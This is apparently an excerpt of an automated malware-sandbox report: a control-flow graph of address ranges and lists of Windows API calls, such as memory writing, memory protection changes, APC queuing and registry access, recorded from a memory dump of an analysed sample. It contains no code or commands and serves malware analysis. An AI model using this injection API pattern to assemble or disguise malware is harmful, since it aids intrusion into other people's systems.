                            control_flow_graph 716 dabc00-dabc4e 717 dabc58-dabc6b call db23db 716->717 718 dabc50-dabc51 716->718 721 dabcaf-dabce8 call da65e4 717->721 722 dabc6d-dabc7f StrRChrA 717->722 718->717 728 dabcea-dabcf0 721->728 729 dabd0e-dabd16 721->729 724 dabc81-dabc84 722->724 725 dabc86-dabc87 722->725 727 dabc8d-dabca9 call daa9c8 724->727 725->727 727->721 728->729 730 dabcf2-dabcfa 728->730 731 dabd18-dabd22 729->731 732 dabd24-dabd4a 729->732 730->729 734 dabcfc-dabd01 730->734 731->732 735 dabd8f-dabd99 731->735 742 dabd4c-dabd53 call dabdbc 732->742 743 dabd83-dabd89 732->743 736 dabd03-dabd0c 734->736 737 dabd9b-dabda2 735->737 738 dabda9-dabdba 735->738 736->729 736->736 737->738 742->743 749 dabd55-dabd5c 742->749 750 dabd8b-dabd8d 743->750 751 dabd5e-dabd6e RtlAddVectoredContinueHandler 749->751 752 dabd74-dabd77 call daeef8 749->752 750->735 750->738 751->752 754 dabd7c-dabd81 752->754 754->743 754->750
                            APIs
                            • StrRChrA.KERNELBASE ref: 00DABC73
                            • RtlAddVectoredContinueHandler.NTDLL ref: 00DABD67
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120092798.0000000000DA1000.00000020.80000000.00040000.00000000.sdmp, Offset: 00DA1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_da1000_control.jbxd
                            Similarity
                            • API ID: ContinueHandlerVectored
                            • String ID:
                            • API String ID: 3758255415-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RegOpenKeyExA.KERNELBASE(?,?,?,?,?,?,00018944,00DB8F1E,?,?,?,?,?,?,0000007E,00DAF548), ref: 00DB8A6C
                            • RegCloseKey.KERNELBASE ref: 00DB8AEF
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120092798.0000000000DA1000.00000020.80000000.00040000.00000000.sdmp, Offset: 00DA1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_da1000_control.jbxd
                            Similarity
                            • API ID: CloseOpen
                            • String ID:
                            • API String ID: 47109696-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,?,-00000008,00000000,00DB1105), ref: 00DC86B6
                            • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,-00000008,00000000,00DB1105), ref: 00DC8723
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120092798.0000000000DA1000.00000020.80000000.00040000.00000000.sdmp, Offset: 00DA1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_da1000_control.jbxd
                            Similarity
                            • API ID: CloseQueryValue
                            • String ID:
                            • API String ID: 3356406503-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RegCreateKeyA.ADVAPI32(?,?,?,00DC9153), ref: 00DC7027
                            • RegOpenKeyA.ADVAPI32(?,?,?,00DC9153), ref: 00DC7034
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120092798.0000000000DA1000.00000020.80000000.00040000.00000000.sdmp, Offset: 00DA1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_da1000_control.jbxd
                            Similarity
                            • API ID: CreateOpen
                            • String ID:
                            • API String ID: 436179556-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120092798.0000000000DA1000.00000020.80000000.00040000.00000000.sdmp, Offset: 00DA1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_da1000_control.jbxd
                            Similarity
                            • API ID: CreateQueueThreadUser
                            • String ID:
                            • API String ID: 3600083758-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120092798.0000000000DA1000.00000020.80000000.00040000.00000000.sdmp, Offset: 00DA1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_da1000_control.jbxd
                            Similarity
                            • API ID: ProtectVirtual
                            • String ID:
                            • API String ID: 544645111-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RtlDeleteBoundaryDescriptor.NTDLL ref: 00DBB5F6
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120092798.0000000000DA1000.00000020.80000000.00040000.00000000.sdmp, Offset: 00DA1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_da1000_control.jbxd
                            Similarity
                            • API ID: BoundaryDeleteDescriptor
                            • String ID:
                            • API String ID: 3203483114-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120092798.0000000000DA1000.00000020.80000000.00040000.00000000.sdmp, Offset: 00DA1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_da1000_control.jbxd
                            Similarity
                            • API ID: Sleep
                            • String ID:
                            • API String ID: 3472027048-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • FindCloseChangeNotification.KERNELBASE ref: 00DA4A08
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120092798.0000000000DA1000.00000020.80000000.00040000.00000000.sdmp, Offset: 00DA1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_da1000_control.jbxd
                            Similarity
                            • API ID: ChangeCloseFindNotification
                            • String ID:
                            • API String ID: 2591292051-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120092798.0000000000DA1000.00000020.80000000.00040000.00000000.sdmp, Offset: 00DA1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_da1000_control.jbxd
                            Similarity
                            • API ID: ProtectVirtual
                            • String ID:
                            • API String ID: 544645111-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 00DA6D24: NtWriteVirtualMemory.NTDLL ref: 00DA6D43
                            • VirtualProtectEx.KERNELBASE ref: 00DA4A9C
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120092798.0000000000DA1000.00000020.80000000.00040000.00000000.sdmp, Offset: 00DA1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_da1000_control.jbxd
                            Similarity
                            • API ID: Virtual$MemoryProtectWrite
                            • String ID:
                            • API String ID: 1789425917-0
                            Uniqueness

                            Uniqueness Score: -1.00%